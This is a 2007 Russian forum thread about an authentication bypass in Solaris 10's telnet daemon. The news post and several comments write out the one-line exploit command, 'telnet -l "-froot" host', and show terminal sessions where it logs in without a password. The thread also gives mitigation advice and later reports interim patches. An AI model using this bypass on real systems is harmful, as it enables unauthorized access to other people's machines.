URL: https://www.opennet.me/cgi-bin/openforum/vsluhboard.cgi
Форум: vsluhforumID3
Нить номер: 36695
[ Назад ]

Исходное сообщение
"OpenNews: Критическая проблема безопасности в telnet сервисе Solaris"

Отправлено opennews , 13-Фев-07 14:51 
В стандартном telnet сервисе (in.telnetd) Solaris 10 обнаружена (http://secunia.com/advisories/24120/) уязвимость позволяющая без лишних усилий получить доступ к системе путем комбинации -l и -f опций.


Например, для входа на удаленную систему без пароля под пользователем root достаточно набрать: telnet -l "-froot" host. Суть в передаче аргумента опции "-l" программе login без проверки, login в свою очередь интерпретирует "-f" - как вход без запроса пароля.


Исправление проблемы еще не анонсировано Sun Microsystems, поэтому крайне рекомендуется отключить in.telnetd сервис или заблокировать пакетным фильтром 23 tcp порт.


Примечательно, что в 1994 году идентичная проблема
была найдена (http://osvdb.org/displayvuln.php?osvdb_id=1007) в сервисе rlogin операционной системы AIX.

URL: http://blogs.securiteam.com/index.php/archives/814
Новость: http://www.opennet.me/opennews/art.shtml?num=9842


Содержание

Сообщения в этом обсуждении
"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено dvg_lab , 13-Фев-07 14:51 
к вопросу о том кто у кого код слямзил :-)

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено lomo , 13-Фев-07 15:34 
Давно так не офигевал от Соляры..
Промышленные, блин, системы...

(from linux server to solaris 10 x86 U3 + patches)

$ telnet -l"-fjimb" sol10
Trying 10.10.14.3...
Connected to sol10.
Escape character is '^]'.
Last login: Mon Feb 12 12:05:20 from rhel4es-sb
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
[jimb@sol10(pts/1) ~]$


"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено alk , 14-Фев-07 11:10 
что то я не понимаю ... у меня такой номер не прошел
[root@main:/] #telnet -l"froot" 10.0.0.2
Trying 10.0.0.2...
Connected to 10.0.0.2.
Escape character is '^]'.


SunOS 5.10

Password:


"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено Аноним , 14-Фев-07 11:56 
telnet -l "-froot" 10.0.0.2

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено alk , 14-Фев-07 14:49 
Мда.... нехило
[root@main:/] #telnet -l"falk" 10.0.0.2
Trying 10.0.0.2...
Connected to 10.0.0.2.
Escape character is '^]'.

SunOS 5.10

Sourcing //.profile-EIS.....
alk@cnr1 # uname -a
SunOS cnr1 5.10 Generic sun4u sparc SUNW,Sun-Fire-V210


"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено мимоход , 17-Фев-07 19:36 
что-то у меня работает только на десятке, и то не под рутом, на девятке - нет.

>Мда.... нехило
>[root@main:/] #telnet -l"falk" 10.0.0.2
>Trying 10.0.0.2...
>Connected to 10.0.0.2.
>Escape character is '^]'.
>
>SunOS 5.10
>
>Sourcing //.profile-EIS.....
>alk@cnr1 # uname -a
>SunOS cnr1 5.10 Generic sun4u sparc SUNW,Sun-Fire-V210



"Давно так не офигевал от Соляры.."
Отправлено Квагга , 14-Фев-07 22:13 
А Соляра другой, простите, ни одного дня не была.

Вот уже с 95-го на моей памяти все дыры в ней были строго ГОМЕРИЧЕСКОГО масштаба.

Отродясь это было визиткой Соляры.


"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено Андрей , 13-Фев-07 15:57 
Нормальные люди отключают телнет ( по крайней мере для доступа из инета и др. небезопасных сетей )

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено mike_t , 13-Фев-07 15:59 
telnets тоже не использовать?

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено Advanced Аноним , 13-Фев-07 15:59 
я уверен что число машин с включённым telnetd мизерно, так что, хоть сам факт такой глупой ошибки и вызывает непонятные чувства, но никак не подрывает авторитет Solaris...

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено Advanced Аноним , 13-Фев-07 15:59 
Кстати, в адвойзари ошибка, под рутом в дефолтной инсталляции нельзя зайти. Только под каким-нибудь другим юзером.

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено ABorland , 13-Фев-07 16:19 
Неужели кто то еще пользуется телнетом?

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено lionGAD , 13-Фев-07 16:51 
конечно..
например у меня вся безопасность лежит на плечах цысок и внутри сети серверы максимально разгружены и бегают по телнету и rsh к друг другу в гости..

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено Dmitry , 13-Фев-07 17:06 
че правда и внутри телнет руту открыт ?
ну вы отважный перец :-)
хотя бы защиту от дурака предусмотрели, а то у нас один клоун вместо
контроллера сам домен на Sun Fire так вот ребутнул по ошибке, так сразу
все по-нормальному вывели ......

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено lionGAD , 13-Фев-07 17:17 
> че правда и внутри телнет руту открыт ?
>ну вы отважный перец :-)
>хотя бы защиту от дурака предусмотрели, а то у нас один клоун вместо
>контроллера сам домен на Sun Fire так вот ребутнул по ошибке, так сразу
>все по-нормальному вывели ......
у меня в сети дураков нету.. не та сеть, не те задачи... просто я привёл пример что телнет всё таки нужен

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено Pavel , 13-Фев-07 17:54 
Дураки есть везде, в том числе и на этом сайте в постах

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено emp , 13-Фев-07 19:03 
у нормальных админов все эти телнеты и рсаши бегают в отдельном влане.

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено iptables , 13-Фев-07 17:12 
Ну и ну, телнет действительно не актуален, но проблемма есть. Что касается удалённого входа, то не думаю, что админ оставит открытым телнет для инета, ибо это уже не админ...

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено Хомяк , 13-Фев-07 17:21 
Да Солярку в Сеть вообще лучше не выставлять :-)))

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено adil_18 , 13-Фев-07 17:33 
да уж

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено Oles , 13-Фев-07 17:55 
Промышленная система ;)
SunOS 5.10 Generic_118855-14 i86pc i386 i86pc
df -h показывает
/dev/md/dsk/d50        825G 16384E   1.2T 2152924666864% /somemount
df -k показывает
/dev/md/dsk/d50      865477325 18446744073261050460 1305323708 2152924666864% /somemount
эх, бардак...

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено L.Torvalds , 13-Фев-07 18:44 
Ну чего раскудахтались? Ошибки у всех бывают :) Хотя конечно неприято ...
По делу надо добавить:
- подвержены _только_ Solaris 10. Старые соляры все держат пучком :)
- root'ом не зайдешь. Можно только юзером. Утешение слабое, но на безрыбьи ...

Самое паскудное - патча нет. Второй день пошел. Для тех кому telnet таки нужен, очень "горячий" второй fu*ng день :-/


"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено Аноним , 13-Фев-07 19:21 
а на Sol9 sun не работает это

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено morph , 13-Фев-07 20:03 
телнет к сожалению остался на еще момедах, коммутаторах и прочей лабуде. Интересно, неужели sshd на сервере хавает ресурсов больше? Вернее...неверно вопрос задал - в масштабе производительности хорошего сервера (даже на x86) будет заметна разница?

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено гость , 13-Фев-07 21:40 
Если железо не на помойке подобрано, то ничего заметно не будет при условии что количество сессий и объем трафика в них не выражаются 4х значными числами.

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено fi , 13-Фев-07 21:39 
Многие проги под виндоус исторически заточены работать с сервером без ssh.  Конечно, все внутри, но где гарантия , что изнутри нет желающих.

Более того, когда у нас админы опечаленные положением дел, без предупреждения закрыли сервисы (telnet и rexec) - народ взвыл! открыли в тот же вечер - переконфигурировать всех клиентов было не реально :))))


"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено Аноним , 13-Фев-07 23:59 
Грамотный подход, Control VLAN и access lists. Покрайней мере на коммутаторы ходим telnet, на рутера и сервера - ssh only.

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено ламусанонимус , 14-Фев-07 00:09 
>Грамотный подход, Control VLAN и access lists. Покрайней мере на коммутаторы ходим
>telnet, на рутера и сервера - ssh only.
Напоминает виндузевый подход - если с фаерволом, антивирусом и браузер не IE использовать то даже вроде и не очень дырявая система получается :)

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено Аноним , 14-Фев-07 07:51 
Да лан, что никто не помнит дыру в том же телнете под четвертой фряхой ?

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено FSA , 14-Фев-07 21:45 
Сколько себя помню, а начинал с FreeBSD 4.x, ни разу не пользовался телнетом... В голову просто не приходило, SSH хватает.

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено Аноним , 14-Фев-07 12:15 
ISR (Interim Security Relief) patches are now available for the Solaris 10
in.telnetd vulnerability from http://sunsolve.sun.com/tpatches

The Descriptions and readme links are currently empty, but they should be there
shortly.

The ISR's are :

IDR125456-01.zip  -  Solaris 10 SPARC
IDR125457-01.zip  -  Solaris 10 x86

Patch 120068-01 (SPARC) or 120069-01 (x86) are required patches, however none of
these patches/ISR's require a reboot and they will take effect immediately.